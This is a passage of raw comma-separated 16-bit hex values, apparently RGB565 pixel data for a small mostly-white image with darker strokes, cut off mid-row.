0x8d56, 0x8cf4, 0xa5b7, 0xefff, 0xffff, 0xffbf, 0xffff, 0x9ebe, 0x0b73, 0x555b, 0xefff, 0xffbe, 0xffde, 0xf7ff, 0xf7ff, 0xfffe, 0xfffd, 0xefff, 0x7e3c, 0x0b96, 0x85ba, 0xefff, 0xffff, 0xffff, 0xb63b, 0x226b, 0xcf9f, 0xcf5d, 0xd75f, 0xd73f, 0xdf3e, 0xdf5e, 0xd73e, 0xd73e, 0xd73e, 0xdf5d, 0xd73e, 0xd73e, 0xcf3e, 0xd75e, 0xd75d, 0xdf3e, 0xdf3e, 0xdf3f, 0xcf1e, 0xd77e, 0xdfbf, 0xcf1c, 0xdf7e, 0xdf7f, 0x4b71, 0x6d18, 0xefff, 0xfffe, 0xffdd, 0xfffe, 0xd7ff, 0x23f5, 0x1b94, 0xcfff, 0xf7ff, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xffdf,
0xfffe, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0x9e9e, 0x0b54, 0x5dbc, 0xe7ff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xfffd, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xe7ff, 0x43f6, 0x43d4, 0xefff, 0xe79e, 0x1189, 0xa67f, 0xe7ff, 0x4acf, 0x7432, 0xefff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbe, 0xfffd, 0xefff, 0xa75f, 0x1bb4, 0x4436, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xe7ff, 0x2bf4, 0x13d5, 0xa7bf, 0xf7ff, 0xffba, 0xffbf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xcf3f, 0x0a70, 0x0b78, 0x035a, 0x0b78, 0x1355, 0x0b56, 0x0b58, 0x1379, 0x0a93, 0x6476, 0xf7ff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffdf, 0xffbb, 0xe7ff, 0x4d5c, 0x0b53, 0xaefe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xcfdf, 0x33f4, 0x1bb4, 0xc7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xbf1f, 0x02b5, 0x02b6, 0x859d, 0xf7ff, 0xbe7c, 0x0a0f, 0xdf19, 0xe7ff, 0x5418, 0x3290, 0xffff, 0xfffe, 0xf7ff, 0x6c96, 0x32cf, 0xe7ff, 0xe7df, 0x324e, 0x8d19, 0xe7ff, 0xb71f, 0x1270, 0x02b5, 0x859b, 0xffff, 0xffde, 0xf7ff, 0xfffe, 0xffdd, 0xdfff, 0x44da, 0x0b76, 0xb75f, 0xffff, 0xffde, 0xffff, 0xf7df, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7ff, 0xc7ff, 0x1b92, 0x3c56, 0xd7ff, 0xf7ff, 0xffdc, 0xfffe, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7df, 0xefff, 0x4b0e, 0xdfdf, 0xefff, 0x9d75, 0xe79f, 0xe7bf, 0x9557, 0xefff, 0xdf9f, 0x42ef, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffde, 0xf7ff, 0x3417, 0x03da, 0xdf7e, 0xf7ff, 0xf7df, 0xf7ff, 0xf7ff, 0xfffe, 0xffdd, 0xffff, 0xffff, 0xffff, 0xfffd, 0xf7ff, 0xaf3f, 0x1b74, 0x4457, 0xdfff, 0xffff, 0xf7de, 0xf7ff, 0xefff, 0xc6de, 0xadf8, 0xc6ba, 0x84f5, 0x7cd8, 0x6cd8, 0x8557, 0x8d55, 0xae3a, 0xb67d, 0xae1b, 0xefff, 0xf7ff, 0xf7ff, 0xbebc, 0xa5fa, 0xcf9f, 0x8558, 0xe7ff, 0x8cd4, 0xf7ff, 0xd77f, 0xb71f, 0x9e7e, 0xc73f, 0xffff, 0xffff, 0xffbf, 0xefff, 0xffde, 0xffbe, 0xd7bf, 0x2c37, 0x1bd5, 0xdfff, 0xffff, 0xffde, 0xf7ff, 0xf7ff, 0xfffe, 0xfffe, 0xe7ff, 0x3416, 0x0bd8, 0xc71e, 0xf7ff, 0xfffe, 0xffdf, 0xf7ff, 0xae3a, 0x7c93, 0x84d5, 0x7cd6, 0x8518, 0x7494, 0x7d15, 0x74b4, 0x8538, 0x7cd6, 0x7433, 0x7cf6, 0x7d16, 0x6cd4, 0x74f5, 0x8557, 0x6c54, 0x8d38, 0x7cb5, 0x8516, 0x7cd4, 0x7473, 0x84f6, 0x7cb5, 0x7cd5, 0x9578, 0xefff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xe7ff, 0x6d9a, 0x0b53, 0x8ebf, 0xefff, 0xfffe, 0xfffe, 0xf7ff, 0xffff, 0xffde, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xf7ff, 0xdfff, 0x657a, 0x1b53, 0x9ebe, 0xefff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffc, 0xf7ff, 0xefbf, 0x94f6, 0x7434, 0x6cb8, 0x2314, 0x4bf6, 0xefff, 0xe79f, 0x118a, 0xa67f, 0xdfff, 0x4aef, 0x7432, 0xefff, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xf7ff, 0xd7ff, 0x3bf4, 0x2373, 0xcfff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xd7ff, 0x1b93, 0x3455, 0xd7ff, 0xffff, 0xffbd, 0xffdf, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0x5436, 0x0273, 0x0b58, 0x0377, 0x0b56, 0x0b35, 0x0b56, 0x1378, 0x0b38, 0x1337, 0x022f, 0xd77f, 0xffff, 0xffbe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdd, 0xefff, 0x867f, 0x1353, 0x7dba, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xa75f, 0x23b3, 0x4cb6, 0xdfff, 0xf7ff, 0xffdf, 0xffdf, 0xffde, 0xffff, 0xbf3f, 0x0295, 0x0275, 0xae7f, 0xffff, 0x9d99, 0x1ab3, 0xffbd, 0xe7ff, 0x2ad2, 0x6cb8, 0xffff, 0xffdc, 0xf7ff, 0x9e3b, 0x0a0d, 0xc77f, 0xefff, 0x5b71, 0x5b93, 0xe7ff, 0xc79f, 0x12af, 0x02b6, 0x859b, 0xf7ff, 0xffff, 0xffff, 0xffbe, 0xfffd, 0xe7ff, 0x6dfd, 0x1375, 0x963d, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xf7ff, 0x96df, 0x1393, 0x6559, 0xefff, 0xfffe, 0xffdd, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xd75f, 0x536f, 0xefff, 0xeffe, 0x9d76, 0xe7bf, 0xdf7f, 0x9d76, 0xf7ff, 0xe7bf, 0x4b50, 0xe7bf, 0xffff, 0xffdf, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffd, 0xffdd, 0xffff, 0x5d1a, 0x03d9, 0xb6bb, 0xf7ff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xf7ff, 0xffdf, 0xffdd, 0xf7ff, 0x865d, 0x1375, 0x7ddc, 0xf7ff, 0xf7df, 0xffff, 0xf7ff, 0xefff, 0xbefe, 0x95b9, 0xe7ff, 0xe7ff, 0x8d5b, 0x2270, 0x6c95, 0xdfdf, 0xe7df, 0xbe7e, 0xaddb, 0xf7ff, 0xfffd, 0xf7ff, 0x63d2, 0xc73f, 0x7516, 0x8dda, 0xa65c, 0x7c73, 0xf7ff, 0xc6fc, 0x4393, 0x2ad1, 0x9dda, 0xffff, 0xfffe, 0xffdf, 0xf7ff, 0xffbd, 0xffde, 0xefff, 0x4cda, 0x1394, 0xbf7f, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xd7ff, 0x23b5, 0x1c5b, 0xefff, 0xffdf, 0xffde, 0xffdf, 0xf7df, 0xffff, 0xffff, 0xf7ff, 0xdfff, 0x5c14, 0xbede, 0xcf9f, 0x4bd1, 0xcfff, 0xbeff, 0x6bd4, 0xe7ff, 0x8d57, 0x8d97, 0xdfff, 0x53b2, 0xbf3f, 0xb6df, 0x53d1, 0xe7ff, 0x9db9, 0x7cb5, 0xe7ff, 0xe7ff, 0xefff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xefff, 0xffff, 0xffff, 0x9ede, 0x0bb4, 0x5dbc, 0xe7ff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffde, 0xffff, 0xf7ff,
0xffff, 0xffde, 0xffff, 0xf7ff, 0xcfff, 0x3c97, 0x2392, 0xcf9f, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdc, 0xffff, 0xe79f, 0x5b4f, 0x3a6c, 0x3311, 0x22f3, 0x4bf5, 0xefff, 0xdf9f, 0x098b, 0x9e7f, 0xdfff, 0x4aef, 0x7432, 0xefff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xefff, 0x5cb7, 0x1b33, 0xaf9f, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffde, 0xf7ff, 0xa6ff, 0x1332, 0x6518, 0xefff, 0xffff, 0xffbf, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xbf1f, 0x1292, 0x1358, 0x0337, 0x1397, 0x0b56, 0x0b57, 0x0b58, 0x0b37, 0x0b57, 0x0b78, 0x02d5, 0x5c57, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0xbfbf, 0x2373, 0x5cb7, 0xe7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0x76bf, 0x1b73, 0x85da, 0xefff, 0xfffe, 0xffdf, 0xffdf, 0xffde, 0xf7fe, 0xb73f, 0x0ab5, 0x0a95, 0xc71f, 0xffff, 0x6c12, 0x3397, 0xffff, 0xc6de, 0x11ed, 0xb6df, 0xf7ff, 0xffdc, 0xfffe, 0xd79f, 0x126f, 0x7d9b, 0xe7ff, 0x8cd5, 0x3a4e, 0xe7ff, 0xcfdf, 0x2b0e, 0x0294, 0x859b, 0xf7ff, 0xffff, 0xffdf, 0xffbf, 0xfffd, 0xefff, 0x9f1f, 0x1374, 0x6519, 0xefff, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffde, 0xf7ff, 0x75bc, 0x0b74, 0x869d, 0xefff, 0xffdd, 0xffde, 0xf7ff, 0xefff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7fe, 0xf7ff, 0xd73f, 0x4b0e, 0xf7ff, 0xf7ff, 0xa597, 0xe7df, 0xdfbf, 0x9d95, 0xf7fe, 0xffff, 0x430f, 0xdf9f, 0xf7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xfffe, 0xffdd, 0xffff, 0x8e5e, 0x03b7, 0x85d9, 0xefff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xffff, 0xf7ff, 0xffdf, 0xffbe, 0xf7ff, 0x553a, 0x0b96, 0xaeff, 0xfffe, 0xffff, 0xffdf, 0xffde, 0xf7ff, 0xc73d, 0x9e5b, 0x8538, 0x096b, 0xc75f, 0x95db, 0xdfbf, 0x324c, 0x6c13, 0xc6bd, 0xb5fa, 0xffdf, 0xffdb, 0xffff, 0xceff, 0x4bb1, 0xdfff, 0x43b0, 0xe7ff, 0x5b4f, 0xd73c, 0xae5a, 0x5c15, 0x4b95, 0x9578, 0xf7fe, 0xf7bd, 0xf7bf, 0xf7ff, 0xffbd, 0xffde, 0xefff, 0x75fd, 0x0b32, 0x965b, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xbf3f, 0x1b33, 0x453d, 0xf7ff, 0xfffe, 0xffdf, 0xffdf, 0xf7df, 0xffff, 0xffbd, 0xffff, 0xc6fe, 0x328e, 0xefff, 0x7c95, 0x74d5, 0xdfff, 0x4330, 0xb61c, 0xdfbf, 0x3a4b, 0xf7ff, 0xb63b, 0x4b30, 0xdfff, 0x4bd1, 0xae5a, 0xe7ff, 0x326c, 0xcf3f, 0xefff, 0xf7ff, 0xf7dd, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xffdf, 0xffdf, 0xc79f, 0x13f6, 0x2cd9, 0xdfff, 0xffde, 0xfffe, 0xf7ff, 0xffff, 0xffbe, 0xffff, 0xefff,
0xf7ff, 0xffde, 0xffbd, 0xf7ff, 0xc7ff, 0x2c56, 0x33f4, 0xd7df, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7df, 0xefdf, 0xf7ff, 0xf7ff, 0xdfff, 0x43f6, 0x4bd4, 0xefff, 0xe79f, 0x09ab, 0x9e7f, 0xe7ff, 0x4aef, 0x7433, 0xe7ff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xfffe, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xefff, 0x8579, 0x2373, 0x8edf, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdd, 0xf7ff, 0x863d, 0x1373, 0x8dfc, 0xf7ff, 0xffff, 0xf7ff, 0xf7fe, 0xffdf, 0xffff, 0xf7ff, 0xf7fe, 0xf7ff, 0xffff, 0xffdf, 0xefff, 0x4bf4, 0x0af5, 0x0b59, 0x0338, 0x0b36, 0x1357, 0x1358, 0x0358, 0x0b57, 0x1397, 0x0338, 0x0b59, 0x0252, 0xcf3f, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0xcfff, 0x2bb4, 0x4456, 0xdfdf, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0x55ff, 0x1353, 0xa6bd, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xb71f, 0x0252, 0x1ad3, 0xdfbf, 0xffff, 0x42cd, 0x6d3c, 0xf7ff, 0x6c14, 0x3b30, 0xdfff, 0xf7ff, 0xffdd, 0xffbd, 0xefff, 0x5c77, 0x126e, 0xe7ff, 0xcedc, 0x1929, 0xe7ff, 0xdfff, 0x4b8f, 0x0253, 0x857b, 0xf7ff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xf7ff, 0xbfbf, 0x1b72, 0x4c97, 0xe7ff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffd, 0xffdd, 0xf7ff, 0x653c, 0x0b75, 0xa75f, 0xf7ff, 0xffbe, 0xffdf, 0xf7ff, 0xefff, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xffdf, 0xf7fe, 0xf7fe, 0xefff, 0xbe7d, 0x5b50, 0xf7ff, 0xdf5c, 0x84b2, 0xe7df, 0xdfdf, 0x7cb0, 0xc6ba, 0xf7bf, 0x5371, 0xc6dd, 0xf7ff, 0xffff, 0xf7bf, 0xf7df, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xfffe, 0xffdd, 0xf7ff, 0xaf3f, 0x0b96, 0x6537, 0xe7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdd, 0xfffe, 0xf7ff, 0xffff, 0xffdf, 0xefff, 0x3c78, 0x13d7, 0xb75f, 0xffdd, 0xf7fe, 0xffff, 0xffdf, 0xfffe, 0xc73b, 0x8db8, 0xc75f, 0xa61d, 0xbf5f, 0x2aad, 0xae7d, 0xae1c, 0xc71f, 0xbebc, 0xadd8, 0xffff, 0xffdd, 0xffff, 0x8cd6, 0xbedc, 0xb69a, 0x9db8, 0xd73f, 0x8cd5, 0xefff, 0xefff, 0xd77f, 0xbe9e, 0xf7ff, 0xf7fe, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0x96bf, 0x1332, 0x7dba, 0xefff, 0xf7df, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xa69e, 0x1b13, 0x661f, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffde, 0xffdd, 0xffff, 0xefff, 0x9d78, 0x7c53, 0xf7ff, 0x532f, 0xb6bd, 0xefff, 0x3a6b, 0xefff, 0xd6fd, 0x4a8b, 0xf7ff, 0x8d57, 0x7d36, 0xe7ff, 0x3a8b, 0xd77f, 0xd79f, 0x430e, 0xf7ff, 0xffdd, 0xfffd, 0xf7fd, 0xefff, 0xffff, 0xefff, 0xf7ff, 0xffde, 0xffde, 0xcfbf, 0x1458, 0x1c57, 0xdfff, 0xfffd, 0xfffd, 0xf7ff, 0xffff, 0xffbd, 0xffff, 0xefff,
0xefff, 0xffff, 0xffde, 0xffff, 0xc7ff, 0x23f5, 0x3c76, 0xd7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xffff, 0xf7ff, 0xdfff, 0x3bd4, 0x4bf4, 0xf7ff, 0xe7bf, 0x11aa, 0xa67f, 0xe7ff, 0x52ce, 0x7433, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0x95fb, 0x2332, 0x7e7f, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xefff, 0x761c, 0x1394, 0x965e, 0xf7ff, 0xf7ff, 0xe7ff, 0xfffd, 0xfffe, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xf7bf, 0xf7df, 0xcf5f, 0x0a4f, 0x0b78, 0x0b7a, 0x0358, 0x1358, 0x0b17, 0x0b39, 0x0b79, 0x0b57, 0x0b36, 0x0b78, 0x0b7a, 0x02b5, 0x5436, 0xf7ff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xefff, 0xc7ff, 0x3436, 0x3436, 0xcf9f, 0xffff, 0xffde, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xfffe, 0x457d, 0x1b73, 0xb6fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7fe, 0xb71e, 0x1290, 0x3353, 0xe7ff, 0xe7be, 0x0947, 0xcfdf, 0xdfbf, 0x0908, 0xa61b, 0xefff, 0xffff, 0xff9d, 0xff9d, 0xffff, 0xcf9f, 0x018b, 0xa65b, 0xf7ff, 0x324d, 0xa63f, 0xefff, 0x8cb4, 0x0252, 0x8d7c, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffdf, 0xffff, 0xd7ff, 0x2bb2, 0x3c55, 0xd7ff, 0xf7df, 0xffdf, 0xffde, 0xffff, 0xffde, 0xf7ff, 0xf7ff, 0xffdd, 0xffdc, 0xefff, 0x4cdb, 0x1396, 0xbfbf, 0xf7ff, 0xffde, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffff, 0xf7fe, 0xefff, 0x6392, 0xb61c, 0xae39, 0x8d33, 0xd71b, 0xf7ff, 0xf7ff, 0xdf7c, 0x9d35, 0xb61c, 0xa5fb, 0x63b1, 0xf7ff, 0xffff, 0xf7df, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xefff, 0xb77f, 0x13b6, 0x54d6, 0xe7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffd, 0xffff, 0xf7ff, 0xffff, 0xffdf, 0xefff, 0x2c37, 0x1418, 0xc79f, 0xffdc, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xc6fb, 0x8d75, 0xe7ff, 0xdfff, 0xc7bf, 0x7d99, 0xb71f, 0xdfff, 0xe7ff, 0xa67b, 0x9dd7, 0xf7ff, 0xffbe, 0xf79e, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xf7ff, 0xf7ff, 0xf7fe, 0xeffe, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xffff, 0xefff, 0x9f3f, 0x1b52, 0x757a, 0xefff, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xf7ff, 0x95fc, 0x1b33, 0x767f, 0xffff, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xffdd, 0xfffd, 0xf7ff, 0xefdf, 0x530e, 0xc67b, 0xe77f, 0x4aac, 0xe77f, 0xb63a, 0x532d, 0xf7ff, 0x8473, 0x84b3, 0xe7df, 0x432e, 0xbe9c, 0xc6fd, 0x4aed, 0xefff, 0x8cf5, 0x6bd0, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xefff, 0xf7ff, 0xffdd, 0xffdd, 0xd7df, 0x249a, 0x1417, 0xdfff, 0xfffd, 0xfffe, 0xefff, 0xf7ff, 0xffdd, 0xffdf, 0xf7ff,
0xf7ff, 0xffff, 0xffde, 0xffff, 0xcfff, 0x1bd3, 0x3cb7, 0xcfff, 0xf7ff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7ff, 0xfffe, 0xfffe, 0xe7ff, 0x3bb3, 0x4bd3, 0xf7ff, 0xefbf, 0x11aa, 0x9e9f, 0xe7ff, 0x5ace, 0x7c32, 0xdfff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0x9e3b, 0x2311, 0x765f, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xefff, 0x6ddb, 0x13b4, 0x969f, 0xf7ff, 0xffff, 0xefff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0x6cd9, 0x0252, 0x0b78, 0x0338, 0x0b79, 0x0b38, 0x1359, 0x0b59, 0x0b58, 0x0b36, 0x1357, 0x1358, 0x0359, 0x1378, 0x12b1, 0xcf5f, 0xffff, 0xffdf, 0xffdf, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xefff, 0xcfff, 0x3c77, 0x2bf5, 0xcfdf, 0xffff, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x355d, 0x1b93, 0xbf1e, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffd, 0xf7ff, 0xb6fe, 0x120e, 0x64b7, 0xe7ff, 0x8d55, 0x53d1, 0xdfff, 0x4b12, 0x5351, 0xefff, 0xf7ff, 0xffdf, 0xffbf, 0xffbe, 0xffbf, 0xefff, 0x8d59, 0x11ab, 0xdfff, 0x8dbb, 0x4372, 0xefff, 0xb5d9, 0x01d0, 0x959c, 0xffdf, 0xfffe, 0xf7fe, 0xeffe, 0xffff, 0xf7bf, 0xdfff, 0x2bf3, 0x2c33, 0xd7ff, 0xf7ff, 0xffbf, 0xffdf, 0xf7ff, 0xffde, 0xf7ff, 0xf7ff, 0xffdd, 0xffdd, 0xefff, 0x3479, 0x13d6, 0xc7df, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xd73e, 0x3a4c, 0xefff, 0x9577, 0xefff, 0xf7ff, 0xf7ff, 0xefde, 0xf7ff, 0xe7df, 0x9d59, 0xefff, 0x3a8c, 0xcefd, 0xf7ff, 0xf7df, 0xffff, 0xfffe, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xf7ff, 0xaf5f, 0x1bd6, 0x4475, 0xe7ff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xe7ff, 0x2416, 0x1c38, 0xcfdf, 0xffdd, 0xf7ff, 0xfffe, 0xffff, 0xf7ff, 0xe7df, 0x84f4, 0x9553, 0x8534, 0x85b9, 0x7d9a, 0x8598, 0x8d76, 0x8d57, 0x6c95, 0xcf7f, 0xe7ff, 0xffdf, 0xffff, 0xffde, 0xfffe, 0xffdf, 0xffbf, 0xef7f, 0xe7bf, 0xf7ff, 0xf7bd, 0xfffe, 0xfffe, 0xffbe, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xffde, 0xffde, 0xefff, 0x9f7f, 0x1372, 0x6d59, 0xe7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffdf, 0xf7ff, 0x8ddb, 0x1b53, 0x7e7f, 0xffdf, 0xf7ff, 0xf7ff, 0xf7fe, 0xfffe, 0xffde, 0xffff, 0xf7ff, 0xefdf, 0xc67b, 0xf7ff, 0xdf5e, 0xd6fc, 0xffff, 0xcedd, 0xd77f, 0xf7ff, 0xbe7b, 0xe7ff, 0xd7bf, 0xc6dc, 0xf7ff, 0xcefd, 0xdf7e, 0xf7ff, 0xcebb, 0xf7bf, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffbf, 0xffff, 0xf7ff, 0xf7ff, 0xfffd, 0xfffd, 0xd7ff, 0x2cba, 0x13f6, 0xd7df, 0xffdd, 0xfffe, 0xefff, 0xf7ff, 0xfffe, 0xffdf, 0xffff,
0xffff, 0xffff, 0xffdf, 0xf7ff, 0xcfff, 0x23f3, 0x3c96, 0xcfff, 0xf7ff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdd, 0xffff, 0xf7ff, 0xffff, 0xffde, 0xefff, 0x3bd3, 0x4bf3, 0xf7ff, 0xe7bf, 0x09ab, 0x969f, 0xe7ff, 0x52ce, 0x7432, 0xdfff, 0xf7ff, 0xffff, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffdf, 0xfffe, 0xf7ff, 0xefff, 0x961c, 0x2353, 0x765f, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xf7ff, 0x6ddc, 0x13b4, 0x969e, 0xf7ff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xcf7f, 0x1ad3, 0x1359, 0x1359, 0x1377, 0x1336, 0x1357, 0x0b58, 0x0358, 0x0b57, 0x1b78, 0x1317, 0x1317, 0x1379, 0x0b78, 0x02b2, 0x7d59, 0xffff, 0xffde, 0xffdf, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xffdf, 0xfffe, 0xf7ff, 0xd7ff, 0x3456, 0x2bf5, 0xc7ff, 0xf7ff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x359f, 0x1b73, 0xb6fd, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xc71f, 0x09cc, 0xa67e, 0xdfff, 0x2a6c, 0xdfff, 0x6c98, 0x0909, 0xe7df, 0xf7ff, 0xfffe, 0xffbd, 0xffff, 0xffdf, 0xffbe, 0xffff, 0xefff, 0x32af, 0x3332, 0xd7ff, 0x120b, 0xc73f, 0xe7df, 0x01af, 0x8d39, 0xffff, 0xfffe, 0xf7fe, 0xf7ff, 0xffff, 0xf7df, 0xd7ff, 0x23b3, 0x3434, 0xdfff, 0xffff, 0xffbf, 0xffff, 0xf7ff, 0xfffe, 0xf7ff, 0xf7ff, 0xffdd, 0xfffd, 0xe7ff, 0x34b9, 0x0bd6, 0xbfbf, 0xffff, 0xffde, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xe7df, 0x29e9, 0xef9f, 0xf7ff, 0x8d36, 0xe7ff, 0xf7ff, 0xf7df, 0xefff, 0xe7ff, 0xdfdf, 